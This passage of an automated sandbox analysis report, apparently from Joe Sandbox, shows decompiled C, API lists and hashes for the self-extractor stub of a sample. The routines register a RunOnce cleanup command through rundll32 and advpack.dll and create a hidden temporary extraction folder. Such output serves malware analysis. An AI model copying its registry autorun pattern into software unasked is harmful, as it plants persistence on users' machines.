                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c83d5209a2386070fa05629ffc4cad0c34b214cdd0b701e68fa9e013c2d68e97
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D900264252144979A141B70DD194157791BA4D602BA15662E022C4694EF6440505512
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E008D202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                            				int _v536;
                                                                                                                                                                                                                                            				int _v540;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				void _t56;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                                            				_t28 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                            				_t84 = 0x104;
                                                                                                                                                                                                                                            				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                            				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                            				_t66 = 0;
                                                                                                                                                                                                                                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                            					return E008D6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E008D171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                            					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                            					if(_t41 != 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t87 = _t87 + 1;
                                                                                                                                                                                                                                            					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                            					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                            					_t79 = _t84;
                                                                                                                                                                                                                                            					E008D658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                            					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                            					_t84 = _t46;
                                                                                                                                                                                                                                            					if(_t84 == 0) {
                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0x8d9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                                            							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							_pop(_t86);
                                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						_t72 =  &_v268;
                                                                                                                                                                                                                                            						_t80 = _t72 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t49 =  *_t72;
                                                                                                                                                                                                                                            							_t72 = _t72 + 1;
                                                                                                                                                                                                                                            						} while (_t49 != 0);
                                                                                                                                                                                                                                            						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                            						_t81 = 0x8d91e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t50 =  *_t81;
                                                                                                                                                                                                                                            							_t81 = _t81 + 1;
                                                                                                                                                                                                                                            						} while (_t50 != 0);
                                                                                                                                                                                                                                            						_t84 = _t73 + 0x50 + _t81 - 0x8d91e5;
                                                                                                                                                                                                                                            						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x8d91e5);
                                                                                                                                                                                                                                            						if(_t90 != 0) {
                                                                                                                                                                                                                                            							 *0x8d8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                            							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            							E008D171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                            							_t75 = _t90;
                                                                                                                                                                                                                                            							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                            							_t79 = _t23;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t56 =  *_t75;
                                                                                                                                                                                                                                            								_t75 = _t75 + 1;
                                                                                                                                                                                                                                            							} while (_t56 != 0);
                                                                                                                                                                                                                                            							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                            							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                            							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                            							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t79 = 0x4b5;
                                                                                                                                                                                                                                            						E008D44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                            					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                            					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                            					if(_t91 == 0) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            						E008D658A( &_v268, 0x104, 0x8d1140);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            				 *0x8d8530 = _t66;
                                                                                                                                                                                                                                            				goto L23;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x008d21a2
                                                                                                                                                                                                                                            0x008d21a6
                                                                                                                                                                                                                                            0x008d21a8
                                                                                                                                                                                                                                            0x008d21b0
                                                                                                                                                                                                                                            0x008d21b0
                                                                                                                                                                                                                                            0x008d21b2
                                                                                                                                                                                                                                            0x008d21b3
                                                                                                                                                                                                                                            0x008d21bc
                                                                                                                                                                                                                                            0x008d21c7
                                                                                                                                                                                                                                            0x008d21cb
                                                                                                                                                                                                                                            0x008d21f1
                                                                                                                                                                                                                                            0x008d21f6
                                                                                                                                                                                                                                            0x008d21fd
                                                                                                                                                                                                                                            0x008d21ff
                                                                                                                                                                                                                                            0x008d21ff
                                                                                                                                                                                                                                            0x008d2204
                                                                                                                                                                                                                                            0x008d2213
                                                                                                                                                                                                                                            0x008d2218
                                                                                                                                                                                                                                            0x008d221d
                                                                                                                                                                                                                                            0x008d221d
                                                                                                                                                                                                                                            0x008d2220
                                                                                                                                                                                                                                            0x008d2220
                                                                                                                                                                                                                                            0x008d2222
                                                                                                                                                                                                                                            0x008d2223
                                                                                                                                                                                                                                            0x008d2229
                                                                                                                                                                                                                                            0x008d223d
                                                                                                                                                                                                                                            0x008d2249
                                                                                                                                                                                                                                            0x008d2250
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2250
                                                                                                                                                                                                                                            0x008d21d2
                                                                                                                                                                                                                                            0x008d21d9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d21d9
                                                                                                                                                                                                                                            0x008d213a
                                                                                                                                                                                                                                            0x008d2141
                                                                                                                                                                                                                                            0x008d2144
                                                                                                                                                                                                                                            0x008d214c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2163
                                                                                                                                                                                                                                            0x008d2172
                                                                                                                                                                                                                                            0x008d2172
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2163
                                                                                                                                                                                                                                            0x008d20ea
                                                                                                                                                                                                                                            0x008d20f0
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D2050
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D205F
                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 008D208C
                                                                                                                                                                                                                                              • Part of subcall function 008D171E: _vsnprintf.MSVCRT ref: 008D1750
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D20C9
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D20EA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 008D2103
                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D2122
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 008D2134
                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D2144
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 008D215B
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D218C
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D21C1
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D21E4
                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 008D223D
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D2249
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D2250
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                                                            • API String ID: 178549006-3726664654
                                                                                                                                                                                                                                            • Opcode ID: 0f6b85e4818443ba0e748f31a17fbe8df79093e171ad2d6b3a09967fba5923b1
                                                                                                                                                                                                                                            • Instruction ID: 621398109ca5c96675251e72901f36ca861cab889cec3be52ed70d50d82e3269
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f6b85e4818443ba0e748f31a17fbe8df79093e171ad2d6b3a09967fba5923b1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4511471A01218EBDB249B64DC49FEA773CFF60700F1043A7FA59E3350EA759D898A60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            [Graph for function 8d55a0 not reproduced. API calls on its nodes: LocalAlloc, LocalFree, lstrcmpA, GetTempPathA, GetWindowsDirectoryA, GetDriveTypeA, GetFileAttributesA, CreateDirectoryA, SetFileAttributesA.]
                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E008D55A0(void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v265;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t35;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                            				long _t48;
                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                                            				char _t66;
                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                            				int _t68;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				int _t70;
                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                            				int _t73;
                                                                                                                                                                                                                                            				CHAR* _t82;
                                                                                                                                                                                                                                            				CHAR* _t88;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                            				_t2 = E008D468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t109 != 0) {
                                                                                                                                                                                                                                            					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                            					_t32 = E008D468F(_t82, _t109, 1);
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                                                                                            						if(_t33 == 0) {
                                                                                                                                                                                                                                            							 *0x8d9a30 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						_t35 =  *0x8d8b3e; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t35;
                                                                                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                                                                                            							__eflags =  *0x8d8a24; // 0x0
                                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                            								_t101 = 0x7d2;
                                                                                                                                                                                                                                            								_t36 = E008D6517(_t82, 0x7d2, 0, E008D3210, 0, 0);
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0x8d9a30; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t109 = 0x8d91e4;
                                                                                                                                                                                                                                            									_t40 = GetTempPathA(0x104, 0x8d91e4);
                                                                                                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                            										_push(_t82);
                                                                                                                                                                                                                                            										E008D1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                            										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                            										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                            												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                            												__eflags = _t109 - 6;
                                                                                                                                                                                                                                            												if(_t109 == 6) {
                                                                                                                                                                                                                                            													L22:
                                                                                                                                                                                                                                            													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                            													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L23;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													__eflags = _t109 - 3;
                                                                                                                                                                                                                                            													if(_t109 != 3) {
                                                                                                                                                                                                                                            														L23:
                                                                                                                                                                                                                                            														__eflags = _t109 - 2;
                                                                                                                                                                                                                                            														if(_t109 != 2) {
                                                                                                                                                                                                                                            															L28:
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                            															if(_t66 == 0x41) {
                                                                                                                                                                                                                                            																L29:
                                                                                                                                                                                                                                            																_t60 = _t66 + 1;
                                                                                                                                                                                                                                            																_v268 = _t60;
                                                                                                                                                                                                                                            																goto L42;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                            																if(_t66 == 0x42) {
                                                                                                                                                                                                                                            																	goto L29;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t68 = E008D6952( &_v268);
                                                                                                                                                                                                                                            																	__eflags = _t68;
                                                                                                                                                                                                                                            																	if(_t68 == 0) {
                                                                                                                                                                                                                                            																		goto L28;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                            																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                            																			L30:
                                                                                                                                                                                                                                            																			_push(0);
                                                                                                                                                                                                                                            																			_t103 = 3;
                                                                                                                                                                                                                                            																			_t49 = E008D597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                            																			__eflags = _t49;
                                                                                                                                                                                                                                            																			if(_t49 != 0) {
                                                                                                                                                                                                                                            																				L33:
                                                                                                                                                                                                                                            																				_t50 = E008D2630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t50;
                                                                                                                                                                                                                                            																				if(_t50 != 0) {
                                                                                                                                                                                                                                            																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t88 =  &_v268;
                                                                                                                                                                                                                                            																				E008D658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                            																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                            																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                            																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                            																					__eflags = _t54;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				__eflags = _t54;
                                                                                                                                                                                                                                            																				if(_t54 != 0) {
                                                                                                                                                                                                                                            																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                            																					_push(_t88);
                                                                                                                                                                                                                                            																					_t109 = 0x8d91e4;
                                                                                                                                                                                                                                            																					E008D1781(0x8d91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                            																					_t101 = 1;
                                                                                                                                                                                                                                            																					_t59 = E008D5467(0x8d91e4, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t59;
                                                                                                                                                                                                                                            																					if(_t59 != 0) {
                                                                                                                                                                                                                                            																						goto L45;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t60 = _v268;
                                                                                                                                                                                                                                            																						goto L42;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                            																					_v265 = 0;
                                                                                                                                                                                                                                            																					_v268 = _t60;
                                                                                                                                                                                                                                            																					goto L42;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				_t65 = E008D2630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t65;
                                                                                                                                                                                                                                            																				if(_t65 != 0) {
                                                                                                                                                                                                                                            																					goto L28;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t67 = E008D597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t67;
                                                                                                                                                                                                                                            																					if(_t67 == 0) {
                                                                                                                                                                                                                                            																						goto L28;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						goto L33;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			goto L28;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L22;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L47;
                                                                                                                                                                                                                                            												L42:
                                                                                                                                                                                                                                            												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                            											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t101 = 1;
                                                                                                                                                                                                                                            										_t69 = E008D5467(0x8d91e4, 1, 3); // executed
                                                                                                                                                                                                                                            										__eflags = _t69;
                                                                                                                                                                                                                                            										if(_t69 != 0) {
                                                                                                                                                                                                                                            											goto L45;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t82 = 0x8d91e4;
                                                                                                                                                                                                                                            											_t70 = E008D2630(0, 0x8d91e4, 1);
                                                                                                                                                                                                                                            											__eflags = _t70;
                                                                                                                                                                                                                                            											if(_t70 != 0) {
                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t101 = 1;
                                                                                                                                                                                                                                            												_t82 = 0x8d91e4;
                                                                                                                                                                                                                                            												_t71 = E008D5467(0x8d91e4, 1, 1);
                                                                                                                                                                                                                                            												__eflags = _t71;
                                                                                                                                                                                                                                            												if(_t71 != 0) {
                                                                                                                                                                                                                                            													goto L45;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                                            														goto L19;
                                                                                                                                                                                                                                            														L43:
                                                                                                                                                                                                                                            														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            														_push(4);
                                                                                                                                                                                                                                            														_t101 = 3;
                                                                                                                                                                                                                                            														_t82 =  &_v268;
                                                                                                                                                                                                                                            														_t44 = E008D597D(_t82, _t101, 1);
                                                                                                                                                                                                                                            														__eflags = _t44;
                                                                                                                                                                                                                                            													} while (_t44 != 0);
                                                                                                                                                                                                                                            													goto L2;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                            							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								_t72 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0x8d8b3f - _t35; // 0x0
                                                                                                                                                                                                                                            								_t72 = 0;
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t101 = 0;
                                                                                                                                                                                                                                            							_t73 = E008D5467(0x8d8b3e, 0, _t72);
                                                                                                                                                                                                                                            							__eflags = _t73;
                                                                                                                                                                                                                                            							if(_t73 != 0) {
                                                                                                                                                                                                                                            								L45:
                                                                                                                                                                                                                                            								_t38 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t101 = 0x4be;
                                                                                                                                                                                                                                            								E008D44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L2;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t101 = 0x4b1;
                                                                                                                                                                                                                                            						E008D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						 *0x8d9124 = 0x80070714;
                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t101 = 0x4b5;
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					_t38 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L47:
                                                                                                                                                                                                                                            				return E008D6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x008d579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d57a0
                                                                                                                                                                                                                                            0x008d57a9
                                                                                                                                                                                                                                            0x008d57ae
                                                                                                                                                                                                                                            0x008d57b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d57b0
                                                                                                                                                                                                                                            0x008d579e
